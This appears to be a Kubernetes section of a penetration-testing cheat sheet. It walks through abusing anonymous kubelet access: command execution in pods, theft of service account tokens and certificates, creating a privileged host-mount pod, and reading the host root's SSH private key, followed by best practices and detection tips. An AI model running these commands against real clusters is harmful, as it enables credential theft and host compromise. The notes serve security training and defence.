15.Kubernetes

curl https://<node_ip>:10250/pods -k | jq

kubeletctl -i --server <node_ip> pods

kubeletctl -i --server <node_ip> scan rce

kubeletctl -i --server <node_ip> exec "id" -p <pod_name> -c <container_name>

kubeletctl -i --server <node_ip> exec "cat /var/run/secrets/kubernetes.io/serviceaccount/token" -p <pod_name> -c <container_name> | tee -a k8.token

kubeletctl --server <node_ip> exec "cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt" -p <pod_name> -c <container_name> | tee -a ca.crt

export token=`cat k8.token`

kubectl --token=$token --certificate-authority=ca.crt --server=https://<api_server_ip>:6443 auth can-i --list

kubectl --token=$token --certificate-authority=ca.crt --server=https://<api_server_ip>:6443 apply -f privesc.yaml

kubectl --token=$token --certificate-authority=ca.crt --server=https://<api_server_ip>:6443 get pods

kubeletctl --server <node_ip> exec "cat /root/root/.ssh/id_rsa" -p privesc -c privesc

Get pods

kubectl get pods -A

Get services

kubectl get svc -A

Get deployments

kubectl get deployments -A

Get namespaces

kubectl get ns

Get secrets

kubectl get secrets -A -o yaml

Get service accounts

kubectl get sa -A -o yaml

Get roles

kubectl get roles -A -o yaml

Get rolebindings

kubectl get rolebindings -A -o yaml

Kubernetes Architecture:
- Control Plane (Master Node): Manages the cluster.
- Worker Nodes (Minions): Run containerized applications.
- Pods: Smallest deployable units, containing one or more containers.
Kubernetes API:
- Central point of interaction.
- Uses RESTful requests.
- Authentication and Authorization (RBAC).
Kubelet API:
- Agent running on each node.
- Can be vulnerable to anonymous access.
- Allows interaction with pods and containers.
Security Domains:
- Cluster infrastructure security.
- Cluster configuration security.
- Application security.
- Data security.

Vulnerabilities and Exploitation Techniques:

Anonymous Access to Kubelet:
- Using curl or kubeletctl to access the Kubelet API.
- Retrieving pod information.
- Executing commands within containers.
Service Account Tokens and Certificates:
- Extracting tokens and certificates from within a compromised pod.
- Using kubectl with the extracted credentials.
- Checking access rights (kubectl auth can-i).
Privileged Pod Creation:
- Creating a pod with a host root mount.
- Accessing host system files.
- Using hostNetwork: true, for network access to the host.
RBAC Misconfigurations:
- Exploiting overly permissive RBAC roles.
Container Vulnerabilities:
- Exploiting known vulnerabilities in container images.

Exploitation Steps (as described):

Access Kubelet API:
- curl or kubeletctl to retrieve pod information.
Extract Service Account Credentials:
- kubeletctl exec to retrieve token and certificate.
Use kubectl with Extracted Credentials:
- kubectl auth can-i to check permissions.
Create Privileged Pod:
- Create a YAML file with a host root mount.
- kubectl apply to create the pod.
Access Host Files:
- kubeletctl exec to access host files.

Important Considerations and Enhancements:

Security Best Practices:
- Disable anonymous access to Kubelet.
- Implement strong RBAC policies.
- Use Network Policies.
- Regularly scan container images for vulnerabilities.
- Use pod security policies or pod security standards.
- Use secrets management.
Attack Vectors:
- Compromised container images.
- Misconfigured RBAC.
- Vulnerabilities in Kubernetes components.
Detection:
- Monitor Kubelet API access.
- Audit RBAC configurations.
- Use security scanning tools.
Namespaces: Reinforce the importance of namespaces in kubernetes security.
Real World Examples: Researching real world kubernetes escapes will help solidify understanding of the attack vectors.
Container Runtime Security: Ensure the underlying container runtime is secure.

Last updated 2 months ago